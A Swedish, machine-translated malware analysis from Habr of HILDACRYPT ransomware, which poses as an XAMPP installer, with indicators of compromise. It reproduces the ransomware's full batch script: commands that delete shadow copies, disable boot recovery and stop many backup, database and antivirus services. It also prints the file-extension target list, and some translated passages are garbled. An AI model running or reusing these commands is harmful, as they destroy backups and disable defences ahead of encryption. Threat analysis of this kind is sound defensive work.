Hej, Habr! Återigen pratar vi om de senaste versionerna av skadlig programvara från kategorin Ransomware. HILDACRYPT är en ny ransomware, en medlem av familjen Hilda upptäckte i augusti 2019, uppkallad efter Netflix-tecknad film som användes för att distribuera programvaran. Idag bekantar vi oss med de tekniska funktionerna hos detta uppdaterade ransomware-virus.
I den första versionen av Hilda ransomware, en länk till en upplagd på Youtube tecknade serier fanns med i lösenbrevet. HILDACRYPT maskerar sig som ett legitimt XAMPP-installationsprogram, en lättinstallerad Apache-distribution som inkluderar MariaDB, PHP och Perl. Samtidigt har kryptolåsaren ett annat filnamn - xamp. Dessutom har ransomware-filen ingen elektronisk signatur.
Statisk analys
Ransomwaren finns i en PE32 .NET-fil skriven för MS Windows. Dess storlek är 135 168 byte. Både huvudprogramkoden och försvarsprogramkoden skrivs i C#. Enligt sammanställningsdatum och tidsstämpel skapades binären den 14 september 2019.
Enligt Detect It Easy arkiveras ransomware med Confuser och ConfuserEx, men dessa obfuscatorer är desamma som tidigare, bara ConfuserEx är efterföljaren till Confuser, så deras kodsignaturer är liknande.
HILDACRYPT är verkligen förpackat med ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Attackvektor
Med största sannolikhet upptäcktes ransomwaren på en av webbprogrammeringssajterna, som maskerade sig som ett legitimt XAMPP-program.
Hela infektionskedjan kan ses i .
Obfuskation
Ransomware-strängarna lagras i krypterad form. När den startas dekrypterar HILDACRYPT dem med Base64 och AES-256-CBC.
Installation
Först och främst skapar ransomware en mapp i %AppDataRoaming% där parametern GUID (Globally Unique Identifier) genereras slumpmässigt. Genom att lägga till en bat-fil på den här platsen startar ransomware-viruset den med cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & avsluta
Det börjar sedan köra ett batchskript för att inaktivera systemfunktioner eller tjänster.
Skriptet innehåller en lång lista med kommandon som förstör skuggkopior, inaktiverar SQL-servern, säkerhetskopiering och antiviruslösningar.
Till exempel försöker den utan framgång stoppa Acronis Backup-tjänster. Dessutom attackerar den säkerhetskopieringssystem och antiviruslösningar från följande leverantörer: Veeam, Sophos, Kaspersky, McAfee och andra.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
När tjänsterna och processerna som nämns ovan är inaktiverade, samlar kryptolåsaren information om alla pågående processer med hjälp av kommandot tasklist för att säkerställa att alla nödvändiga tjänster är nere.
uppgiftslista v/fo csv
Det här kommandot visar en detaljerad lista över pågående processer, vars element är åtskilda av tecknet ",".
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Efter denna kontroll börjar ransomwaren krypteringsprocessen.
Шифрование
Filkryptering
HILDACRYPT går igenom allt hittat innehåll på hårddiskar, förutom mapparna Recycle.Bin och Reference AssembliesMicrosoft. Den sistnämnda innehåller kritiska dll-, pdb-, etc.-filer för .Net-applikationer som kan påverka driften av ransomware. För att söka efter filer som kommer att krypteras, används följande lista med tillägg:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Ransomwaren använder AES-256-CBC-algoritmen för att kryptera användarfiler. Nyckelstorleken är 256 bitar och initieringsvektorstorleken (IV) är 16 byte.
I följande skärmdump erhölls värdena för byte_2 och byte_1 slumpmässigt med GetBytes().
nyckel
IN OCH
Den krypterade filen har tillägget HCY!.. Detta är ett exempel på en krypterad fil. Nyckeln och IV som nämns ovan skapades för den här filen.
Nyckelkryptering
Kryptolåsaren lagrar den genererade AES-nyckeln i en krypterad fil. Den första delen av den krypterade filen har en rubrik som innehåller data som HILDACRYPT, KEY, IV, FileLen i XML-format och ser ut så här:
AES- och IV-nyckelkryptering görs med RSA-2048, och kodning görs med Base64. Den offentliga RSA-nyckeln lagras i kryptolåsarens kropp i en av de krypterade strängarna i XML-format.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
En offentlig RSA-nyckel används för att kryptera AES-filnyckeln. Den offentliga RSA-nyckeln är Base64-kodad och består av en modul och en offentlig exponent på 65537. Dekryptering kräver den privata RSA-nyckeln som angriparen har.
Efter RSA-kryptering kodas AES-nyckeln med Base64 lagrad i den krypterade filen.
Lösenbelopp meddelande
När krypteringen är klar, skriver HILDACRYPT html-filen till mappen där den krypterade filerna. Aviseringen om ransomware innehåller två e-postadresser där offret kan kontakta angriparen.
Utpressningsmeddelandet innehåller också raden "Ingen loli är säker;)" - en referens till anime- och mangakaraktärer med utseende som små flickor som är förbjudna i Japan.
Utgång
HILDACRYPT, en ny ransomware-familj, har släppt en ny version. Krypteringsmodellen hindrar offret från att dekryptera filer krypterade av ransomware. Cryptolocker använder aktiva skyddsmetoder för att inaktivera skyddstjänster relaterade till säkerhetskopieringssystem och antiviruslösningar. Författaren till HILDACRYPT är ett fan av den animerade serien Hilda som visas på Netflix, vars länk till trailern fanns i utköpsbrevet för den tidigare versionen av programmet.
Som vanligt, и kan skydda din dator från HILDACRYPT ransomware, och leverantörer har möjlighet att skydda sina kunder med . Skyddet säkerställs genom att dessa lösningar inkluderar inkluderar inte bara backup, utan även vårt integrerade säkerhetssystem - Drivs av en maskininlärningsmodell och baserad på beteendeheuristik, en teknik som kan motverka hotet från nolldagars ransomware som ingen annan.
Indikatorer på kompromiss
Filändelsen HCY!
HILDACRYPTReadMe.html
xamp.exe med en bokstav "p" och ingen digital signatur
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Källa: will.com